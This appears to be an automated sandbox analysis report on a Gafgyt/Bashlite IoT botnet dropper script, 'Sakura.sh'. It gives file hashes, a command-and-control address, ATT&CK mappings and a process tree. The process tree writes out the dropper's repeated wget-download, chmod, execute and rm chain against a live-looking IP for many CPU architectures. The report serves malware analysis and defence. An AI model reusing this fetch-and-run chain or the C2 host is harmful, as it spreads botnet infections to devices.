gafgyt | 98ce9f05d20d7511e19c010b550230e094f5ecf2be00cc2630c45c3a4c19e135

Analysis

max time kernel
150s
max time network
154s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
07-01-2025 04:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Sakura.sh
Size

2KB
MD5

99676bbb4d53d0ace58166113e3bb990
SHA1

7b36c64784a672ef00b4edb9caa89bc8315a3a72
SHA256

98ce9f05d20d7511e19c010b550230e094f5ecf2be00cc2630c45c3a4c19e135
SHA512

b8170b04f930e6824cef2406f67f579742140f66f57cb34ecfb96891291cd66589843dddd04b4d9680f2cbe3c68f13fc233e92483caa56ea5bfb43abf9fdd479

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

38.134.189.10:12345

Signatures

Detected Gafgyt variant 11 IoCs

resource	yara_rule
behavioral2/files/fstream-1.dat	family_gafgyt
behavioral2/files/fstream-2.dat	family_gafgyt
behavioral2/files/fstream-3.dat	family_gafgyt
behavioral2/files/fstream-4.dat	family_gafgyt
behavioral2/files/fstream-5.dat	family_gafgyt
behavioral2/files/fstream-6.dat	family_gafgyt
behavioral2/files/fstream-7.dat	family_gafgyt
behavioral2/files/fstream-8.dat	family_gafgyt
behavioral2/files/fstream-9.dat	family_gafgyt
behavioral2/files/fstream-10.dat	family_gafgyt
behavioral2/files/fstream-13.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
743	chmod
776	chmod
782	chmod
795	chmod
811	chmod
825	chmod
691	chmod
702	chmod
708	chmod
717	chmod
730	chmod
838	chmod
846	chmod

Executes dropped EXE 13 IoCs

ioc	pid	Process
/tmp/m-i.p-s.Sakura	692	m-i.p-s.Sakura
/tmp/m-p.s-l.Sakura	704	m-p.s-l.Sakura
/tmp/s-h.4-.Sakura	709	s-h.4-.Sakura
/tmp/x-8.6-.Sakura	718	x-8.6-.Sakura
/tmp/a-r.m-6.Sakura	731	a-r.m-6.Sakura
/tmp/x-3.2-.Sakura	744	x-3.2-.Sakura
/tmp/a-r.m-7.Sakura	777	a-r.m-7.Sakura
/tmp/p-p.c-.Sakura	783	p-p.c-.Sakura
/tmp/i-5.8-6.Sakura	796	i-5.8-6.Sakura
/tmp/m-6.8-k.Sakura	812	m-6.8-k.Sakura
/tmp/p-p.c-.Sakura	826	p-p.c-.Sakura
/tmp/a-r.m-4.Sakura	839	a-r.m-4.Sakura
/tmp/a-r.m-5.Sakura	847	a-r.m-5.Sakura

Reads system routing table 1 TTPs 6 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	a-r.m-4.Sakura
File opened for reading	/proc/net/route	a-r.m-5.Sakura
File opened for reading	/proc/net/route	a-r.m-6.Sakura
File opened for reading	/proc/net/route	p-p.c-.Sakura
File opened for reading	/proc/net/route	m-6.8-k.Sakura
File opened for reading	/proc/net/route	p-p.c-.Sakura

Reads system network configuration 1 TTPs 6 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	a-r.m-4.Sakura
File opened for reading	/proc/net/route	a-r.m-5.Sakura
File opened for reading	/proc/net/route	a-r.m-6.Sakura
File opened for reading	/proc/net/route	p-p.c-.Sakura
File opened for reading	/proc/net/route	m-6.8-k.Sakura
File opened for reading	/proc/net/route	p-p.c-.Sakura

Writes file to tmp directory 13 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/m-i.p-s.Sakura	wget
File opened for modification	/tmp/i-5.8-6.Sakura	wget
File opened for modification	/tmp/a-r.m-4.Sakura	wget
File opened for modification	/tmp/a-r.m-6.Sakura	wget
File opened for modification	/tmp/x-3.2-.Sakura	wget
File opened for modification	/tmp/a-r.m-7.Sakura	wget
File opened for modification	/tmp/p-p.c-.Sakura	wget
File opened for modification	/tmp/m-6.8-k.Sakura	wget
File opened for modification	/tmp/m-p.s-l.Sakura	wget
File opened for modification	/tmp/s-h.4-.Sakura	wget
File opened for modification	/tmp/x-8.6-.Sakura	wget
File opened for modification	/tmp/p-p.c-.Sakura	wget
File opened for modification	/tmp/a-r.m-5.Sakura	wget

/tmp/Sakura.sh
/tmp/Sakura.sh
1⤵
PID:666
- /usr/bin/wget
  wget http://38.134.189.10/m-i.p-s.Sakura
  2⤵
  - Writes file to tmp directory
  PID:675
- /bin/chmod
  chmod +x m-i.p-s.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:691
- /tmp/m-i.p-s.Sakura
  ./m-i.p-s.Sakura
  2⤵
  - Executes dropped EXE
  PID:692
- /bin/rm
  rm -rf m-i.p-s.Sakura
  2⤵
  PID:695
- /usr/bin/wget
  wget http://38.134.189.10/m-p.s-l.Sakura
  2⤵
  - Writes file to tmp directory
  PID:697
- /bin/chmod
  chmod +x m-p.s-l.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:702
- /tmp/m-p.s-l.Sakura
  ./m-p.s-l.Sakura
  2⤵
  - Executes dropped EXE
  PID:704
- /bin/rm
  rm -rf m-p.s-l.Sakura
  2⤵
  PID:706
- /usr/bin/wget
  wget http://38.134.189.10/s-h.4-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:707
- /bin/chmod
  chmod +x s-h.4-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:708
- /tmp/s-h.4-.Sakura
  ./s-h.4-.Sakura
  2⤵
  - Executes dropped EXE
  PID:709
- /bin/rm
  rm -rf s-h.4-.Sakura
  2⤵
  PID:711
- /usr/bin/wget
  wget http://38.134.189.10/x-8.6-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:712
- /bin/chmod
  chmod +x x-8.6-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:717
- /tmp/x-8.6-.Sakura
  ./x-8.6-.Sakura
  2⤵
  - Executes dropped EXE
  PID:718
- /bin/rm
  rm -rf x-8.6-.Sakura
  2⤵
  PID:720
- /usr/bin/wget
  wget http://38.134.189.10/a-r.m-6.Sakura
  2⤵
  - Writes file to tmp directory
  PID:722
- /bin/chmod
  chmod +x a-r.m-6.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:730
- /tmp/a-r.m-6.Sakura
  ./a-r.m-6.Sakura
  2⤵
  - Executes dropped EXE
  - Reads system routing table
  - Reads system network configuration
  PID:731
- /bin/rm
  rm -rf a-r.m-6.Sakura
  2⤵
  PID:734
- /usr/bin/wget
  wget http://38.134.189.10/x-3.2-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:735
- /bin/chmod
  chmod +x x-3.2-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:743
- /tmp/x-3.2-.Sakura
  ./x-3.2-.Sakura
  2⤵
  - Executes dropped EXE
  PID:744
- /bin/rm
  rm -rf x-3.2-.Sakura
  2⤵
  PID:747
- /usr/bin/wget
  wget http://38.134.189.10/a-r.m-7.Sakura
  2⤵
  - Writes file to tmp directory
  PID:748
- /bin/chmod
  chmod +x a-r.m-7.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:776
- /tmp/a-r.m-7.Sakura
  ./a-r.m-7.Sakura
  2⤵
  - Executes dropped EXE
  PID:777
- /bin/rm
  rm -rf a-r.m-7.Sakura
  2⤵
  PID:780
- /usr/bin/wget
  wget http://38.134.189.10/p-p.c-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:781
- /bin/chmod
  chmod +x p-p.c-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:782
- /tmp/p-p.c-.Sakura
  ./p-p.c-.Sakura
  2⤵
  - Executes dropped EXE
  - Reads system routing table
  - Reads system network configuration
  PID:783
- /bin/rm
  rm -rf p-p.c-.Sakura
  2⤵
  PID:786
- /usr/bin/wget
  wget http://38.134.189.10/i-5.8-6.Sakura
  2⤵
  - Writes file to tmp directory
  PID:787
- /bin/chmod
  chmod +x i-5.8-6.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:795
- /tmp/i-5.8-6.Sakura
  ./i-5.8-6.Sakura
  2⤵
  - Executes dropped EXE
  PID:796
- /bin/rm
  rm -rf i-5.8-6.Sakura
  2⤵
  PID:799
- /usr/bin/wget
  wget http://38.134.189.10/m-6.8-k.Sakura
  2⤵
  - Writes file to tmp directory
  PID:800
- /bin/chmod
  chmod +x m-6.8-k.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:811
- /tmp/m-6.8-k.Sakura
  ./m-6.8-k.Sakura
  2⤵
  - Executes dropped EXE
  - Reads system routing table
  - Reads system network configuration
  PID:812
- /bin/rm
  rm -rf m-6.8-k.Sakura
  2⤵
  PID:815
- /usr/bin/wget
  wget http://38.134.189.10/p-p.c-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:817
- /bin/chmod
  chmod +x p-p.c-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:825
- /tmp/p-p.c-.Sakura
  ./p-p.c-.Sakura
  2⤵
  - Executes dropped EXE
  - Reads system routing table
  - Reads system network configuration
  PID:826
- /bin/rm
  rm -rf p-p.c-.Sakura
  2⤵
  PID:829
- /usr/bin/wget
  wget http://38.134.189.10/a-r.m-4.Sakura
  2⤵
  - Writes file to tmp directory
  PID:831
- /bin/chmod
  chmod +x a-r.m-4.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:838
- /tmp/a-r.m-4.Sakura
  ./a-r.m-4.Sakura
  2⤵
  - Executes dropped EXE
  - Reads system routing table
  - Reads system network configuration
  PID:839
- /bin/rm
  rm -rf a-r.m-4.Sakura
  2⤵
  PID:842
- /usr/bin/wget
  wget http://38.134.189.10/a-r.m-5.Sakura
  2⤵
  - Writes file to tmp directory
  PID:844
- /bin/chmod
  chmod +x a-r.m-5.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:846
- /tmp/a-r.m-5.Sakura
  ./a-r.m-5.Sakura
  2⤵
  - Executes dropped EXE
  - Reads system routing table
  - Reads system network configuration
  PID:847
- /bin/rm
  rm -rf a-r.m-5.Sakura
  2⤵
  PID:850

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/a-r.m-5.Sakura

Filesize
98KB

MD5
59eeceee8e46c0928840d591af68afeb

SHA1
4d521aac55eee42b51879e05ce1d3dd01156d791

SHA256
9c7f296b8112c117cdde9a7afde9394615164bc9ee6c563feed02052342bb1c2

SHA512
eb30c14cc1fc35b05392f1db0473dc1c52bb29874470590bf52ea925db00d5b50c146ceda731f17830599cb4d5ad6f2838b5343ecfb3cff69e86ff4a837734e7

Download Submit
/tmp/a-r.m-6.Sakura

Filesize
118KB

MD5
fe37788544f02969c9ad949294d2cb7d

SHA1
1a3579a25283442ac49ee9847bbe31bb6cf2512e

SHA256
5d81e73d00fe727578bdd06c35116019a926d77b05a868b3667384fd5c9b75cf

SHA512
c1aa419f2cd3caf8800d21203dd8b688687b0eaae2cbb4dfe20df671b0d6a16ee6956b2c9739246381265d00161c3fa9ff493d2b82432c1770a48780bde810ca

Download Submit
/tmp/a-r.m-7.Sakura

Filesize
91KB

MD5
5c79bd499240dc6b91a3b536f108329e

SHA1
37b0b46cf036f5bd57a82b40ceb03216025abc61

SHA256
dfb46a70a8ca259968aa7bbf10d57613dbddd125c55e71804984c19f03555e71

SHA512
a34d8b6683bffc3b74e200dc459fed355549f9530b439e0579bb8f9f5a112a2d5f4ac7f8f9ba04785e4e5dc6dc7a0eb86ba3675e7a15142e1bbd03ae5f587373

Download Submit
/tmp/i-5.8-6.Sakura

Filesize
96KB

MD5
c27645e33381978b8a7d3a6d661097ad

SHA1
57d97cfd0e78eaed68cc9441b97bed0da91e24c9

SHA256
f59f8db748ff606c5b1b3a9d4e6384e593deae34642a960830e2284a8ab75c25

SHA512
dd29e5b901d81c1bcd3fcfe9e9728551f6c0c53239750aafc1eedcbb7d62d8fb792d00563d014f36402efa412206defb6ddbc935e3d340ea548a266785645f2f

Download Submit
/tmp/m-6.8-k.Sakura

Filesize
156KB

MD5
4809c88793a97372492b29a89f59c455

SHA1
55cf5e0f3676308cdecbf163a69708cea6392dc5

SHA256
4d57e5b4b10a8363b2fdd134bb139b44cbcd275cdd1474ea95a1a6aee8a78cd1

SHA512
bead5ae01fec656f172d52027d3c94729d5501d6444bebe372f9676372e7f637bf9c13911185e180bd95906dac23003197c77acee3f5b317c7d38250057292c1

Download Submit
/tmp/m-i.p-s.Sakura

Filesize
123KB

MD5
1f4c4496d0c6887624c3c05d309f83d4

SHA1
537e1b6ccba3e1d82cafda5560e5da9d4645c2d3

SHA256
e6afd2316ed37511b7a97ee6d8ef484464978c49ae2637161ec4be03a600b03e

SHA512
c7c98c15c738e9af21fdb2f8dfb5e60c68d6dfcc6da9ba8fa9bd635da27472246dcd37d549ad61eaf1a853a31dcbc8d9b1a7c9359992ea592d2ff811d80223cd

Download Submit
/tmp/m-p.s-l.Sakura

Filesize
123KB

MD5
f983787db4317a7cf0ac870d959b2034

SHA1
11795ff7dcee3dedca4a09c4d7d2937f84dcc32e

SHA256
f56c1493d63cbac0eb60fdd1061f2d1ef926958f62efdf5498b0a1d3e80aca80

SHA512
1eba5b3f9e391d6ad373a5bb969eb783d2dd6e51962ec0935aaf361509fc3880aa2453d281cd6068e8c0934874a2545d057ffbbb8aeddceb4a4d232365e67cd1

Download Submit
/tmp/p-p.c-.Sakura

Filesize
105KB

MD5
930016afe6330d9d180f68daecf2911c

SHA1
d6a3ad7fda3b36d560ebf5f9e7e249298ad97f2c

SHA256
f2940ca1d83c6bfa0b94d9158a79abaffa74a86c78165d4dff6166776a95c97e

SHA512
ffabbfc674cd57af3619867d3ec9265a909b9f04ab0c789e8122ff0a06590b0b06f9efa86a09814daef815b675f6bc601c92b6912b636330545e47d20a863742

Download Submit
/tmp/s-h.4-.Sakura

Filesize
86KB

MD5
9edc866a5c36cdd5646a8ebd991a2819

SHA1
96e12a61911ce1766b7b53073c6a923aea042f9d

SHA256
98901b5d95f179448adf28f974c4040bee998b1826c36da1386f21eff9d5e3f2

SHA512
baf5142e8f104974da8e026ee45bcbd9dca8dd055d8d44831dcd79f74ed2e354ce854d075484dc2eef31a65cfd0199bcaf2d2481a4b345f4ad72c052dc202fe8

Download Submit
/tmp/x-3.2-.Sakura

Filesize
83KB

MD5
57dee730e854b5ba734bcd395b44d012

SHA1
05d02dc536aeb6c21bb00cfd4e44f6d1b6588d6e

SHA256
ce28907943bc46496ee99e0dfb9618644062628502fbcf5ff59be886863d60e5

SHA512
cf595b0599fd6ccd95141e15088d4f2c5ee0206be2df5083eca3b5dab0595b544f03767db4f2ac032d2fb3ab91de9661d49f4e802af436c123a78186eebbe2da

Download Submit
/tmp/x-8.6-.Sakura

Filesize
92KB

MD5
3067f41b7d4f893a49745739204d7799

SHA1
dfbadc517e2c56414e14ca657cebaf414b13902d

SHA256
74260f3d23a34557a1770b2a54dccde7fe8afecfdfd5615426116518780242be

SHA512
4b7961bc2dbbbacdac2ac0a5d021703a3f464b19e827dbfe9dc19f280b5b848a23031d18a5b5a71c57f0b9b1b0cc48d060c4a0e0c6555130a77080a967b1ab33

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads